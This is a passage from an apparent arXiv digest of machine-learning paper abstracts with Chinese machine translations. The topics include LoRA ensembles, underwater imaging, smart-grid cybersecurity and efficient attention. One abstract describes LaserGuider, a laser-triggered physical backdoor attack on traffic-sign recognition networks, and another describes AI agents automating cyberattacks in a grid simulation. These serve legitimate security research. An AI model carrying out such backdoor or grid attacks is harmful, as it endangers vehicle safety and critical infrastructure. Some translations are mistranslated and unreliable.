摘要: 现实世界的决策中许多关键任务依赖于具有校准不确定性估计的机器学习算法。然而,现代方法经常产生过于自信和不校准的预测。各种方法涉及训练一组单独的模型来量化与模型本身相关的不确定性,称为认知不确定性。在显式实现中,集成方法具有高计算成本和高内存需求。这个特定挑战在最先进的神经网络中表现得很明显,如变压器,即使是单个网络在计算和内存方面也已经很有要求。因此,人们努力在实际上不实例化单独的集成成员的情况下模拟集成模型,称为隐式集成。我们介绍了LoRA-Ensemble,这是一种基于低秩适应(LoRA)的自注意网络的参数高效深度集成方法。最初为了高效的LLM微调而开发,我们将LoRA扩展为一种隐式集成方法。通过使用一个预训练的自注意网络,其权重在所有成员之间共享,我们训练特定于成员的低秩矩阵用于注意力投影。我们的方法相对于显式集成表现出更好的校准性,并在各种预测任务和数据集上实现类似或更好的准确性。
更新时间: 2024-12-05 09:23:13
领域: cs.LG
Blind Underwater Image Restoration using Co-Operational Regressor Networks
The exploration of underwater environments is essential for applications such as biological research, archaeology, and infrastructure maintenanceHowever, underwater imaging is challenging due to the waters unique properties, including scattering, absorption, color distortion, and reduced visibility. To address such visual degradations, a variety of approaches have been proposed covering from basic signal processing methods to deep learning models; however, none of them has proven to be consistently successful. In this paper, we propose a novel machine learning model, Co-Operational Regressor Networks (CoRe-Nets), designed to achieve the best possible underwater image restoration. A CoRe-Net consists of two co-operating networks: the Apprentice Regressor (AR), responsible for image transformation, and the Master Regressor (MR), which evaluates the Peak Signal-to-Noise Ratio (PSNR) of the images generated by the AR and feeds it back to AR. CoRe-Nets are built on Self-Organized Operational Neural Networks (Self-ONNs), which offer a superior learning capability by modulating nonlinearity in kernel transformations. The effectiveness of the proposed model is demonstrated on the benchmark Large Scale Underwater Image (LSUI) dataset. Leveraging the joint learning capabilities of the two cooperating networks, the proposed model achieves the state-of-art restoration performance with significantly reduced computational complexity and often presents such results that can even surpass the visual quality of the ground truth with a 2-pass application. Our results and the optimized PyTorch implementation of the proposed approach are now publicly shared on GitHub.
Updated: 2024-12-05 09:15:21
标题: 盲目水下图像恢复使用合作回归网络
摘要: 对水下环境的探索对于生物研究、考古学和基础设施维护等应用至关重要。然而,由于水的独特性质,包括散射、吸收、色彩失真和能见度降低,水下成像具有挑战性。为了解决这些视觉退化问题,提出了各种方法,涵盖了从基本信号处理方法到深度学习模型;然而,这些方法都没有被证明是一贯成功的。在本文中,我们提出了一种新颖的机器学习模型,称为Co-Operational Regressor Networks(CoRe-Nets),旨在实现最佳的水下图像恢复。CoRe-Net由两个协作网络组成:学徒回归器(AR),负责图像转换,和主回归器(MR),评估AR生成的图像的峰值信噪比(PSNR)并将其反馈给AR。CoRe-Nets建立在自组织操作神经网络(Self-ONNs)之上,通过调制核变换中的非线性性而提供卓越的学习能力。所提出模型的有效性在基准大规模水下图像(LSUI)数据集上得到了证明。利用两个协作网络的联合学习能力,所提出的模型实现了最先进的恢复性能,同时大大降低了计算复杂性,并且通常呈现出甚至可以超越视觉质量的结果,仅需两次应用。我们的结果以及所提出方法的优化PyTorch实现现在已在GitHub上公开分享。
更新时间: 2024-12-05 09:15:21
领域: cs.CV,cs.LG,eess.IV
LaserGuider: A Laser Based Physical Backdoor Attack against Deep Neural Networks
Backdoor attacks embed hidden associations between triggers and targets in deep neural networks (DNNs), causing them to predict the target when a trigger is present while maintaining normal behavior otherwise. Physical backdoor attacks, which use physical objects as triggers, are feasible but lack remote control, temporal stealthiness, flexibility, and mobility. To overcome these limitations, in this work, we propose a new type of backdoor triggers utilizing lasers that feature long-distance transmission and instant-imaging properties. Based on the laser-based backdoor triggers, we present a physical backdoor attack, called LaserGuider, which possesses remote control ability and achieves high temporal stealthiness, flexibility, and mobility. We also introduce a systematic approach to optimize laser parameters for improving attack effectiveness. Our evaluation on traffic sign recognition DNNs, critical in autonomous vehicles, demonstrates that LaserGuider with three different laser-based triggers achieves over 90% attack success rate with negligible impact on normal inputs. Additionally, we release LaserMark, the first dataset of real world traffic signs stamped with physical laser spots, to support further research in backdoor attacks and defenses.
Updated: 2024-12-05 09:14:50
标题: 激光引导器:一种基于激光的物理后门攻击深度神经网络
摘要: 后门攻击在深度神经网络(DNNs)中嵌入了触发器和目标之间的隐藏关联,导致它们在存在触发器时预测目标,同时在其他情况下保持正常行为。物理后门攻击使用物理对象作为触发器是可行的,但缺乏远程控制、时间隐蔽性、灵活性和移动性。为了克服这些限制,在这项工作中,我们提出了一种利用具有远程传输和即时成像特性的激光的新型后门触发器。基于基于激光的后门触发器,我们提出了一种名为LaserGuider的物理后门攻击,具有远程控制能力,并实现了高度的时间隐蔽性、灵活性和移动性。我们还介绍了一种系统化方法来优化激光参数,以提高攻击效果。我们在自动驾驶车辆中至关重要的交通标志识别DNNs上的评估表明,具有三种不同基于激光的触发器的LaserGuider实现了超过90%的攻击成功率,对正常输入几乎没有影响。此外,我们发布了LaserMark,第一个用物理激光点印上真实世界交通标志的数据集,以支持后门攻击和防御的进一步研究。
更新时间: 2024-12-05 09:14:50
领域: cs.CR,cs.AI,cs.CV,cs.LG,eess.IV
How well behaved is finite dimensional Diffusion Maps?
Under a set of assumptions on a family of submanifolds $\subset {\mathbb R}^D$, we derive a series of geometric properties that remain valid after finite-dimensional and almost isometric Diffusion Maps (DM), including almost uniform density, finite polynomial approximation and local reach. Leveraging these properties, we establish rigorous bounds on the embedding errors introduced by the DM algorithm is $O\left((\frac{\log n}{n})^{\frac{1}{8d+16}}\right)$. These results offer a solid theoretical foundation for understanding the performance and reliability of DM in practical applications.
Updated: 2024-12-05 09:12:25
标题: 有限维扩散映射表现如何?
摘要: 在一组关于子流形族$\subset {\mathbb R}^D$的假设下,我们推导出了一系列几何性质,这些性质在有限维和几乎等距扩散映射(DM)之后仍然成立,包括几乎均匀密度、有限多项式逼近和局部可达性。利用这些性质,我们建立了DM算法引入的嵌入误差的严格界限为$O\left((\frac{\log n}{n})^{\frac{1}{8d+16}}\right)$。这些结果为理解DM在实际应用中的性能和可靠性提供了坚实的理论基础。
更新时间: 2024-12-05 09:12:25
领域: stat.ML,cs.LG,math.ST,stat.TH
MTMT: Consolidating Multiple Thinking Modes to Form a Thought Tree for Strengthening LLM
Large language models (LLMs) have shown limitations in tasks requiring complex logical reasoning and multi-step problem-solving. To address these challenges, researchers have employed carefully designed prompts and flowcharts, simulating human cognitive processes to enhance LLM performance, such as the Chain of Thought approach. In this paper, we introduce MTMT (Multi-thinking Modes Tree), a novel method that interacts with LLMs to construct a thought tree, simulating various advanced cognitive processes, including but not limited to association, counterfactual thinking, task decomposition, and comparison. By breaking down the original complex task into simpler sub-questions, MTMT facilitates easier problem-solving for LLMs, enabling more effective utilization of the latent knowledge within LLMs. We evaluate the performance of MTMT under different parameter configurations, using GPT-4o mini as the base model. Our results demonstrate that integrating multiple modes of thinking significantly enhances the ability of LLMs to handle complex tasks.
Updated: 2024-12-05 09:05:30
标题: MTMT:整合多种思维模式形成思维树以加强LLM
摘要: 大型语言模型(LLMs)在需要复杂逻辑推理和多步问题解决的任务中显示出局限性。为了解决这些挑战,研究人员采用精心设计的提示和流程图,模拟人类认知过程以增强LLM的性能,例如“思维链”方法。在本文中,我们介绍了MTMT(多思维模式树),这是一种与LLMs互动的新方法,用于构建思维树,模拟各种高级认知过程,包括但不限于联想、反事实思维、任务分解和比较。通过将原始复杂任务分解为更简单的子问题,MTMT促进了LLMs的更轻松问题解决,使LLMs内部潜在知识的利用更加有效。我们评估了在不同参数配置下的MTMT性能,使用GPT-4o mini作为基础模型。我们的结果表明,整合多种思维模式显著提高了LLMs处理复杂任务的能力。
更新时间: 2024-12-05 09:05:30
领域: cs.CL,cs.AI
PDNNet: PDN-Aware GNN-CNN Heterogeneous Network for Dynamic IR Drop Prediction
IR drop on the power delivery network (PDN) is closely related to PDN's configuration and cell current consumption. As the integrated circuit (IC) design is growing larger, dynamic IR drop simulation becomes computationally unaffordable and machine learning based IR drop prediction has been explored as a promising solution. Although CNN-based methods have been adapted to IR drop prediction task in several works, the shortcomings of overlooking PDN configuration is non-negligible. In this paper, we consider not only how to properly represent cell-PDN relation, but also how to model IR drop following its physical nature in the feature aggregation procedure. Thus, we propose a novel graph structure, PDNGraph, to unify the representations of the PDN structure and the fine-grained cell-PDN relation. We further propose a dual-branch heterogeneous network, PDNNet, incorporating two parallel GNN-CNN branches to favorably capture the above features during the learning process. Several key designs are presented to make the dynamic IR drop prediction highly effective and interpretable. We are the first work to apply graph structure to deep-learning based dynamic IR drop prediction method. Experiments show that PDNNet outperforms the state-of-the-art CNN-based methods and achieves 545x speedup compared to the commercial tool, which demonstrates the superiority of our method.
Updated: 2024-12-05 09:02:11
标题: PDNNet:基于PDN意识的GNN-CNN异构网络用于动态IR下降预测
摘要: 功率传输网络(PDN)上的IR降低与PDN的配置和单元电流消耗密切相关。随着集成电路(IC)设计规模的增大,动态IR降模拟变得计算成本高昂,机器学习基础的IR降预测被探索为一种有前途的解决方案。尽管CNN-based方法已经在几项工作中被应用于IR降预测任务,但忽视PDN配置的缺点是不可忽视的。在本文中,我们不仅考虑如何正确表示单元-PDN关系,还考虑如何在特征聚合过程中模拟IR降的物理特性。因此,我们提出了一种新颖的图结构,PDNGraph,以统一PDN结构和细粒度单元-PDN关系的表示。我们进一步提出了一个双分支异构网络,PDNNet,将两个并行的GNN-CNN分支整合在一起,以在学习过程中有利地捕捉上述特征。我们提出了几项关键设计,使动态IR降预测高度有效和可解释。我们是第一个将图结构应用于基于深度学习的动态IR降预测方法的研究。实验表明,PDNNet优于最先进的基于CNN的方法,并与商业工具相比实现了545倍的加速,这证明了我们方法的优越性。
更新时间: 2024-12-05 09:02:11
领域: cs.LG,cs.AI
Safe and Efficient Online Convex Optimization with Linear Budget Constraints and Partial Feedback
This paper studies online convex optimization with unknown linear budget constraints, where only the gradient information of the objective and the bandit feedback of constraint functions are observed. We propose a safe and efficient Lyapunov-optimization algorithm (SELO) that can achieve an $O(\sqrt{T})$ regret and zero cumulative constraint violation. The result also implies SELO achieves $O(\sqrt{T})$ regret when the budget is hard and not allowed to be violated. The proposed algorithm is computationally efficient as it resembles a primal-dual algorithm where the primal problem is an unconstrained, strongly convex and smooth problem, and the dual problem has a simple gradient-type update. The algorithm and theory are further justified in a simulated application of energy-efficient task processing in distributed data centers.
Updated: 2024-12-05 08:58:41
标题: 线性预算约束和部分反馈条件下的安全高效在线凸优化
摘要: 本文研究了具有未知线性预算约束的在线凸优化问题,只观测到目标的梯度信息和约束函数的赌博反馈。我们提出了一种安全高效的Lyapunov优化算法(SELO),可以实现$O(\sqrt{T})$的后悔值和零累积约束违反。结果还表明,当预算是硬性的且不允许违反时,SELO也可以实现$O(\sqrt{T})$的后悔值。所提出的算法在计算上是高效的,因为它类似于一个原始-对偶算法,其中原始问题是一个无约束、强凸和平滑问题,而对偶问题具有简单的梯度类型更新。该算法和理论在分布式数据中心中能源高效任务处理的模拟应用中得到进一步验证。
更新时间: 2024-12-05 08:58:41
领域: math.OC,cs.LG
Exploring Fully Convolutional Networks for the Segmentation of Hyperspectral Imaging Applied to Advanced Driver Assistance Systems
Advanced Driver Assistance Systems (ADAS) are designed with the main purpose of increasing the safety and comfort of vehicle occupants. Most of current computer vision-based ADAS perform detection and tracking tasks quite successfully under regular conditions, but are not completely reliable, particularly under adverse weather and changing lighting conditions, neither in complex situations with many overlapping objects. In this work we explore the use of hyperspectral imaging (HSI) in ADAS on the assumption that the distinct near infrared (NIR) spectral reflectances of different materials can help to better separate the objects in a driving scene. In particular, this paper describes some experimental results of the application of fully convolutional networks (FCN) to the image segmentation of HSI for ADAS applications. More specifically, our aim is to investigate to what extent the spatial features codified by convolutional filters can be helpful to improve the performance of HSI segmentation systems. With that aim, we use the HSI-Drive v1.1 dataset, which provides a set of labelled images recorded in real driving conditions with a small-size snapshot NIR-HSI camera. Finally, we analyze the implementability of such a HSI segmentation system by prototyping the developed FCN model together with the necessary hyperspectral cube preprocessing stage and characterizing its performance on an MPSoC.
Updated: 2024-12-05 08:58:25
标题: 探索全卷积网络用于应用于高级驾驶辅助系统的高光谱成像分割
摘要: 高级驾驶辅助系统(ADAS)旨在增加车辆乘员的安全性和舒适性。目前大多数基于计算机视觉的ADAS在常规条件下能够成功执行检测和跟踪任务,但在恶劣天气和光照条件变化时并不完全可靠,尤其在存在许多重叠对象的复杂情况下亦然。本文探讨了在ADAS中使用高光谱成像(HSI)的可能性,假设不同材料的近红外(NIR)光谱反射特性可以帮助更好地分离驾驶场景中的对象。具体而言,本文描述了将全卷积网络(FCN)应用于HSI图像分割用于ADAS应用的一些实验结果。我们的目标是研究卷积滤波器所编码的空间特征在改善HSI分割系统性能方面能够起到多大作用。为此,我们使用了HSI-Drive v1.1数据集,该数据集提供了在真实驾驶条件下用小型快照近红外-HSI相机记录的一系列标记图像。最后,我们分析了这种HSI分割系统的可实现性,通过原型化开发的FCN模型以及必要的高光谱立方体预处理阶段,并对其在MPSoC上的性能进行了表征。
更新时间: 2024-12-05 08:58:25
领域: cs.CV,cs.AI,cs.LG,eess.IV
R-MTLLMF: Resilient Multi-Task Large Language Model Fusion at the Wireless Edge
Multi-task large language models (MTLLMs) are important for many applications at the wireless edge, where users demand specialized models to handle multiple tasks efficiently. However, training MTLLMs is complex and exhaustive, particularly when tasks are subject to change. Recently, the concept of model fusion via task vectors has emerged as an efficient approach for combining fine-tuning parameters to produce an MTLLM. In this paper, the problem of enabling edge users to collaboratively craft such MTLMs via tasks vectors is studied, under the assumption of worst-case adversarial attacks. To this end, first the influence of adversarial noise to multi-task model fusion is investigated and a relationship between the so-called weight disentanglement error and the mean squared error (MSE) is derived. Using hypothesis testing, it is directly shown that the MSE increases interference between task vectors, thereby rendering model fusion ineffective. Then, a novel resilient MTLLM fusion (R-MTLLMF) is proposed, which leverages insights about the LLM architecture and fine-tuning process to safeguard task vector aggregation under adversarial noise by realigning the MTLLM. The proposed R-MTLLMF is then compared for both worst-case and ideal transmission scenarios to study the impact of the wireless channel. Extensive model fusion experiments with vision LLMs demonstrate R-MTLLMF's effectiveness, achieving close-to-baseline performance across eight different tasks in ideal noise scenarios and significantly outperforming unprotected model fusion in worst-case scenarios. The results further advocate for additional physical layer protection for a holistic approach to resilience, from both a wireless and LLM perspective.
Updated: 2024-12-05 08:57:30
标题: R-MTLLMF:无线边缘的弹性多任务大型语言模型融合
摘要: 多任务大型语言模型(MTLLMs)对于许多无线边缘应用非常重要,用户需要专门的模型来高效处理多个任务。然而,训练MTLLMs是复杂和耗时的,特别是当任务可能发生变化时。最近,通过任务向量融合模型的概念已被提出作为一种有效的方法,用于结合微调参数以生成MTLLM。本文研究了在最坏情况下对抗性攻击的假设下,使边缘用户通过任务向量共同打造这种MTLM的问题。为此,首先研究了对抗性噪声对多任务模型融合的影响,并推导了所谓的权重解缠错误与均方误差(MSE)之间的关系。通过假设检验,直接显示出MSE会增加任务向量之间的干扰,从而使模型融合失效。然后,提出了一种新颖的弹性MTLLM融合(R-MTLLMF),利用对LLM架构和微调过程的见解,通过重新调整MTLLM来保护任务向量在对抗性噪声下的聚合。然后,将提出的R-MTLLMF进行最坏情况和理想传输场景的比较,以研究无线信道的影响。通过对视觉LLMs进行广泛的模型融合实验,展示了R-MTLLMF在理想噪声场景下实现接近基线性能,并在最坏情况下明显优于未受保护的模型融合。结果进一步提倡对物理层进行额外的保护,以实现综合的韧性方法,从无线和LLM的角度进行考虑。
更新时间: 2024-12-05 08:57:30
领域: eess.SP,cs.AI,cs.LG
AI-based Attacker Models for Enhancing Multi-Stage Cyberattack Simulations in Smart Grids Using Co-Simulation Environments
The transition to smart grids has increased the vulnerability of electrical power systems to advanced cyber threats. To safeguard these systems, comprehensive security measures-including preventive, detective, and reactive strategies-are necessary. As part of the critical infrastructure, securing these systems is a major research focus, particularly against cyberattacks. Many methods are developed to detect anomalies and intrusions and assess the damage potential of attacks. However, these methods require large amounts of data, which are often limited or private due to security concerns. We propose a co-simulation framework that employs an autonomous agent to execute modular cyberattacks within a configurable environment, enabling reproducible and adaptable data generation. The impact of virtual attacks is compared to those in a physical lab targeting real smart grids. We also investigate the use of large language models for automating attack generation, though current models on consumer hardware are unreliable. Our approach offers a flexible, versatile source for data generation, aiding in faster prototyping and reducing development resources and time.
Updated: 2024-12-05 08:56:38
标题: 基于人工智能的攻击者模型,用于在智能电网中利用协同仿真环境增强多阶段网络攻击模拟
摘要: 智能电网的转型增加了电力系统面对高级网络威胁的脆弱性。为了保护这些系统,必须采取包括预防、检测和反应策略在内的全面安全措施。作为关键基础设施的一部分,保护这些系统是一个主要的研究重点,特别是针对网络攻击。许多方法已经被开发用于检测异常和入侵,并评估攻击的潜在损害。然而,这些方法需要大量数据,由于安全问题,这些数据通常是有限或私密的。我们提出了一个协同仿真框架,利用一个自主代理来在可配置环境中执行模块化的网络攻击,从而实现可重现和适应性数据生成。虚拟攻击的影响与针对真实智能电网的物理实验室中的攻击进行了比较。我们还研究了使用大型语言模型自动化攻击生成的可能性,尽管目前的模型在消费级硬件上并不可靠。我们的方法为数据生成提供了灵活、多功能的来源,有助于更快地进行原型设计,减少开发资源和时间。
更新时间: 2024-12-05 08:56:38
领域: cs.CR
Continual Low-Rank Scaled Dot-product Attention
Transformers are widely used for their ability to capture data relations in sequence processing, with great success for a wide range of static tasks. However, the computational and memory footprint of their main component, i.e., the Scaled Dot-product Attention, is commonly overlooked. This makes their adoption in applications involving stream data processing with constraints in response latency, computational and memory resources infeasible. Some works have proposed methods to lower the computational cost of transformers, i.e. low-rank approximations, sparsity in attention, and efficient formulations for Continual Inference. In this paper, we introduce a new formulation of the Scaled Dot-product Attention based on the Nystr\"om approximation that is suitable for Continual Inference. In experiments on Online Audio Classification and Online Action Detection tasks, the proposed Continual Scaled Dot-product Attention can lower the number of operations by up to three orders of magnitude compared to the original Transformers while retaining the predictive performance of competing models.
Updated: 2024-12-05 08:49:02
标题: 持续低秩缩放点积注意力
摘要: 变压器因其在序列处理中捕获数据关系的能力而被广泛使用,在各种静态任务中取得了巨大成功。然而,它们的主要组件,即缩放点积注意力的计算和内存占用往往被忽视。这使得它们在涉及带有响应延迟、计算和内存资源约束的流数据处理应用中的采用变得不可行。一些工作已经提出了降低变压器计算成本的方法,即低秩逼近、关注力的稀疏性和用于连续推理的高效公式。在本文中,我们介绍了一种基于Nystrom逼近的缩放点积注意力的新公式,适用于连续推理。在在线音频分类和在线动作检测任务的实验中,所提出的连续缩放点积注意力与原始变压器相比,可以将操作数量降低高达三个数量级,同时保持竞争模型的预测性能。
更新时间: 2024-12-05 08:49:02
领域: cs.CV,cs.LG
Improving Fine-Grained Control via Aggregation of Multiple Diffusion Models
While many diffusion models perform well when controlling for particular aspect among style, character, and interaction, they struggle with fine-grained control due to dataset limitations and intricate model architecture design. This paper introduces a novel algorithm, Aggregation of Multiple Diffusion Models (AMDM), which synthesizes features from multiple diffusion models into a specified model, activating specific features for fine-grained control. Experimental results demonstrate that AMDM significantly improves fine-grained control without training, proving its effectiveness. Additionally, it reveals that diffusion models initially focus on features such as position, attributes, and style, with later stages improving generation quality and consistency. AMDM offers a new perspective for tackling the challenges of fine-grained conditional control generation in diffusion models: We can fully utilize existing or develop new conditional diffusion models that control specific aspects, and then aggregate them using AMDM algorithm. This eliminates the need for constructing complex datasets, designing intricate model architectures, and incurring high training costs. Code is available at: https://github.com/Hammour-steak/AMDM.
Updated: 2024-12-05 08:44:53
标题: 通过聚合多个扩散模型改进细粒度控制
摘要: 尽管许多扩散模型在控制风格、特征和交互等特定方面表现良好,但由于数据集限制和复杂的模型架构设计,它们在细粒度控制方面仍然面临困难。本文介绍了一种新颖的算法,即多扩散模型聚合(AMDM),该算法将多个扩散模型的特征合成到指定模型中,激活特定特征以实现细粒度控制。实验结果表明,AMDM显著改善了细粒度控制,无需训练,并证明了其有效性。此外,研究发现,扩散模型最初专注于位置、属性和风格等特征,后续阶段则改善了生成质量和一致性。AMDM为解决扩散模型中细粒度条件控制生成的挑战提供了新视角:我们可以充分利用现有或开发新的条件扩散模型来控制特定方面,然后使用AMDM算法对它们进行聚合。这消除了构建复杂数据集、设计复杂模型架构和产生高训练成本的需求。代码可在以下链接找到:https://github.com/Hammour-steak/AMDM。
更新时间: 2024-12-05 08:44:53
领域: cs.CV,cs.LG
Digital Twin for Evaluating Detective Countermeasures in Smart Grid Cybersecurity
As the integration of digital technologies and communication systems continues within distribution grids, new avenues emerge to tackle energy transition challenges. Nevertheless, this deeper technological immersion amplifies the necessity for resilience against threats, encompassing both systemic outages and targeted cyberattacks. To ensure the robustness and safeguarding of vital infrastructure, a thorough examination of potential smart grid vulnerabilities and subsequent countermeasure development is essential. This study delves into the potential of digital twins, replicating a smart grid's cyber-physical laboratory environment, thereby enabling focused cybersecurity assessments. Merging the nuances of communication network emulation and power network simulation, we introduce a flexible, comprehensive digital twin model equipped for hardware-in-the-loop evaluations. Through this innovative framework, we not only verify and refine security countermeasures but also underscore their role in maintaining grid stability and trustworthiness.
Updated: 2024-12-05 08:41:08
标题: 智能电网网络安全中用于评估侦察对策的数字孪生技术
摘要: 随着数字技术和通信系统在配电网中的集成持续推进,新的途径出现来解决能源转型挑战。然而,这种更深入的技术融合加剧了对抗威胁的韧性的必要性,包括系统性的停电和有针对性的网络攻击。为了确保重要基础设施的稳健性和保护性,必须对潜在的智能电网漏洞进行彻底检查,并制定相应的对策。本研究探讨了数字孪生技术的潜力,复制智能电网的网络实验室环境,从而实现集中的网络安全评估。将通信网络仿真和电力网络模拟的细微差别融合在一起,我们引入了一个灵活、全面的数字孪生模型,配备硬件在环评估。通过这种创新框架,我们不仅验证和完善安全对策,还强调它们在维护电网稳定性和可信度方面的作用。
更新时间: 2024-12-05 08:41:08
领域: cs.CR
A Data-Driven Framework for Discovering Fractional Differential Equations in Complex Systems
In complex physical systems, conventional differential equations often fall short in capturing non-local and memory effects, as they are limited to local dynamics and integer-order interactions. This study introduces a stepwise data-driven framework for discovering fractional differential equations (FDEs) directly from data. FDEs, known for their capacity to model non-local dynamics with fewer parameters than integer-order derivatives, can represent complex systems with long-range interactions. Our framework applies deep neural networks as surrogate models for denoising and reconstructing sparse and noisy observations while using Gaussian-Jacobi quadrature to handle the challenges posed by singularities in fractional derivatives. To optimize both the sparse coefficients and fractional order, we employ an alternating optimization approach that combines sparse regression with global optimization techniques. We validate the framework across various datasets, including synthetic anomalous diffusion data, experimental data on the creep behavior of frozen soils, and single-particle trajectories modeled by L\'{e}vy motion. Results demonstrate the framework's robustness in identifying the structure of FDEs across diverse noise levels and its capacity to capture integer-order dynamics, offering a flexible approach for modeling memory effects in complex systems.
Updated: 2024-12-05 08:38:30
标题: 一个用于在复杂系统中发现分数阶微分方程的数据驱动框架
摘要: 在复杂的物理系统中,传统的微分方程通常难以捕捉非局部和记忆效应,因为它们局限于局部动态和整数阶相互作用。本研究介绍了一种逐步数据驱动的框架,用于直接从数据中发现分数阶微分方程(FDEs)。FDEs以能够用比整数阶导数更少的参数来建模非局部动态而闻名,可以表示具有长程相互作用的复杂系统。我们的框架将深度神经网络应用作替代模型,用于去噪和重建稀疏和嘈杂的观测数据,同时利用高斯-雅各比积分来处理分数导数中的奇异性所带来的挑战。为了优化稀疏系数和分数阶,我们采用交替优化方法,将稀疏回归与全局优化技术结合起来。我们在各种数据集上验证了该框架,包括合成异常扩散数据、冻土蠕变行为的实验数据以及由L\'{e}vy运动建模的单粒子轨迹。结果表明,该框架在识别不同噪声水平下的FDEs结构方面具有鲁棒性,并具有捕捉整数阶动态的能力,为模拟复杂系统中的记忆效应提供了灵活的方法。
更新时间: 2024-12-05 08:38:30
领域: physics.comp-ph,cs.AI
Demonstration Selection for In-Context Learning via Reinforcement Learning
Diversity in demonstration selection is crucial for enhancing model generalization, as it enables a broader coverage of structures and concepts. However, constructing an appropriate set of demonstrations has remained a focal point of research. This paper presents the Relevance-Diversity Enhanced Selection (RDES), an innovative approach that leverages reinforcement learning to optimize the selection of diverse reference demonstrations for text classification tasks using Large Language Models (LLMs), especially in few-shot prompting scenarios. RDES employs a Q-learning framework to dynamically identify demonstrations that maximize both diversity and relevance to the classification objective by calculating a diversity score based on label distribution among selected demonstrations. This method ensures a balanced representation of reference data, leading to improved classification accuracy. Through extensive experiments on four benchmark datasets and involving 12 closed-source and open-source LLMs, we demonstrate that RDES significantly enhances classification accuracy compared to ten established baselines. Furthermore, we investigate the incorporation of Chain-of-Thought (CoT) reasoning in the reasoning process, which further enhances the model's predictive performance. The results underscore the potential of reinforcement learning to facilitate adaptive demonstration selection and deepen the understanding of classification challenges.
Updated: 2024-12-05 08:33:52
标题: 通过强化学习进行上下文学习的演示选择
摘要: 展示选择中的多样性对于增强模型泛化至关重要,因为它使结构和概念的覆盖范围更广泛。然而,构建一个适当的展示集仍然是研究的焦点。本文介绍了Relevance-Diversity Enhanced Selection(RDES),这是一种创新方法,利用强化学习来优化对大型语言模型(LLMs)进行文本分类任务时的多样参考展示选择,特别是在少样本提示场景中。RDES采用Q-learning框架动态识别最大化多样性和与分类目标相关性的展示,通过基于所选展示之间的标签分布计算多样性得分来实现。该方法确保参考数据的平衡表示,从而提高了分类准确性。通过对四个基准数据集的广泛实验,涉及12个闭源和开源LLMs,我们证明了RDES相对于十个已建立的基线显著提高了分类准确性。此外,我们研究了在推理过程中加入“Chain-of-Thought”(CoT)推理,进一步提高了模型的预测性能。结果强调了强化学习在促进自适应展示选择和加深对分类挑战的理解方面的潜力。
更新时间: 2024-12-05 08:33:52
领域: cs.AI,cs.CL
Tencent Hunyuan3D-1.0: A Unified Framework for Text-to-3D and Image-to-3D Generation
While 3D generative models have greatly improved artists' workflows, the existing diffusion models for 3D generation suffer from slow generation and poor generalization. To address this issue, we propose a two-stage approach named Hunyuan3D-1.0 including a lite version and a standard version, that both support text- and image-conditioned generation. In the first stage, we employ a multi-view diffusion model that efficiently generates multi-view RGB in approximately 4 seconds. These multi-view images capture rich details of the 3D asset from different viewpoints, relaxing the tasks from single-view to multi-view reconstruction. In the second stage, we introduce a feed-forward reconstruction model that rapidly and faithfully reconstructs the 3D asset given the generated multi-view images in approximately 7 seconds. The reconstruction network learns to handle noises and in-consistency introduced by the multi-view diffusion and leverages the available information from the condition image to efficiently recover the 3D structure. Our framework involves the text-to-image model, i.e., Hunyuan-DiT, making it a unified framework to support both text- and image-conditioned 3D generation. Our standard version has 3x more parameters than our lite and other existing model. Our Hunyuan3D-1.0 achieves an impressive balance between speed and quality, significantly reducing generation time while maintaining the quality and diversity of the produced assets.
Updated: 2024-12-05 08:29:51
标题: 腾讯混元3D-1.0:面向文本到3D和图像到3D生成的统一框架
摘要: 3D生成模型极大地改进了艺术家们的工作流程,但现有的3D生成扩散模型存在生成速度慢和泛化能力差的问题。为了解决这个问题,我们提出了一个名为Hunyuan3D-1.0的两阶段方法,包括一个精简版和一个标准版,两者都支持文本和图像条件生成。在第一阶段,我们采用了一个多视角扩散模型,可以在大约4秒内高效生成多视角的RGB。这些多视角图像从不同角度捕捉了3D资产的丰富细节,将任务从单视角重建转变为多视角重建。在第二阶段,我们引入了一个前向重建模型,可以在大约7秒内快速而准确地重建3D资产,给定生成的多视角图像。重建网络学习处理多视角扩散引入的噪音和不一致性,并利用条件图像中的可用信息有效地恢复3D结构。我们的框架涉及文本到图像模型,即Hunyuan-DiT,使其成为一个支持文本和图像条件3D生成的统一框架。我们的标准版比精简版和其他现有模型具有3倍的参数。我们的Hunyuan3D-1.0在速度和质量之间取得了令人印象深刻的平衡,显著缩短生成时间的同时保持了所产生资产的质量和多样性。
更新时间: 2024-12-05 08:29:51
领域: cs.CV,cs.AI
Augmenting Minds or Automating Skills: The Differential Role of Human Capital in Generative AI's Impact on Creative Tasks
Generative AI is rapidly reshaping creative work, raising critical questions about its beneficiaries and societal implications. This study challenges prevailing assumptions by exploring how generative AI interacts with diverse forms of human capital in creative tasks. Through two random controlled experiments in flash fiction writing and song composition, we uncover a paradox: while AI democratizes access to creative tools, it simultaneously amplifies cognitive inequalities. Our findings reveal that AI enhances general human capital (cognitive abilities and education) by facilitating adaptability and idea integration but diminishes the value of domain-specific expertise. We introduce a novel theoretical framework that merges human capital theory with the automation-augmentation perspective, offering a nuanced understanding of human-AI collaboration. This framework elucidates how AI shifts the locus of creative advantage from specialized expertise to broader cognitive adaptability. Contrary to the notion of AI as a universal equalizer, our work highlights its potential to exacerbate disparities in skill valuation, reshaping workplace hierarchies and redefining the nature of creativity in the AI era. These insights advance theories of human capital and automation while providing actionable guidance for organizations navigating AI integration amidst workforce inequalities.
Updated: 2024-12-05 08:27:14
标题: 扩展思维还是自动化技能:人力资本在生成式人工智能对创意任务影响中的差异作用
摘要: 生成式人工智能正在迅速改变创意工作,引发了关于受益人和社会影响的关键问题。本研究通过探索生成式人工智能如何与创意任务中多样化的人力资本互动,挑战了当前的假设。通过两项关于微型小说写作和歌曲创作的随机对照实验,我们揭示了一个悖论:虽然人工智能使得创意工具的获取变得更加民主化,但同时也放大了认知不平等。我们的研究结果表明,人工智能通过促进适应能力和思想整合来增强一般人力资本(认知能力和教育),但却削弱了领域专业知识的价值。我们引入了一个新颖的理论框架,将人力资本理论与自动化增强观点结合起来,提供了对人工智能与人类协作的细致理解。这一框架阐明了人工智能如何将创造性优势的中心从专业专长转移到更广泛的认知适应能力上。与人工智能作为普遍均化器的概念相反,我们的工作强调了它加剧技能价值差异的潜力,重塑了工作层级并重新定义了AI时代创造性的本质。这些见解推动了人力资本和自动化的理论发展,同时为在工作力量不平等中探索AI整合的组织提供了可操作的指导。
更新时间: 2024-12-05 08:27:14
领域: cs.HC,cs.AI,econ.GN,q-fin.EC
Local Curvature Smoothing with Stein's Identity for Efficient Score Matching
